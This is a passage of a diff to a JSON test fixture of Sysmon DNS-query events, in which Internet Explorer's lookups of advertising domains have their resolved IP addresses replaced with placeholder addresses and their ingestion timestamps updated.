SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12689,27 +12553,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -12725,16 +12589,13 @@ "trc.taboola.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313903632Z", + "ingested": "2021-12-09T13:49:44.739709300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12793,12 +12654,12 @@ }, "answers": [ { - "data": "107.178.254.65", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "network": { @@ -12813,13 +12674,13 @@ "pippio.com" ], "ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313905052Z", + "ingested": "2021-12-09T13:49:44.739715200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12883,11 +12744,11 @@ "type": "CNAME" }, { - "data": "209.15.36.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12895,7 +12756,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12903,7 +12764,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12911,7 +12772,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12919,21 +12780,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -12949,22 +12810,22 @@ "pixel-sync.sitescout.com" ], "ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313906679Z", + "ingested": "2021-12-09T13:49:44.739721200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -13024,11 +12885,11 @@ }, "answers": [ { - "data": "35.186.202.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13036,7 +12897,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13044,7 +12905,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -13052,7 +12913,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -13060,7 +12921,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -13069,16 +12930,16 @@ } ], "resolved_ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -13094,23 +12955,23 @@ "prod.y-medialink.com" ], "ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313908042Z", + "ingested": "2021-12-09T13:49:44.739727100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13174,37 +13035,37 @@ "type": "CNAME" }, { - "data": "54.80.117.178", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.217.22.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.215.15", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.54.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.204.186.237", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.46.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -13220,18 +13081,13 @@ "jadserve.postrelease.com" ], "ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313909255Z", + "ingested": "2021-12-09T13:49:44.739732900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13295,39 +13151,39 @@ "type": "CNAME" }, { - "data": "107.21.43.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.220.86", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.172.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.209.65.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.51.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.193.211.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.47.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.151.246", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13336,15 +13192,15 @@ } ], "resolved_ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, @@ -13361,22 +13217,15 @@ "appnexus-partners.tremorhub.com" ], "ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313910472Z", + "ingested": "2021-12-09T13:49:44.739738700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 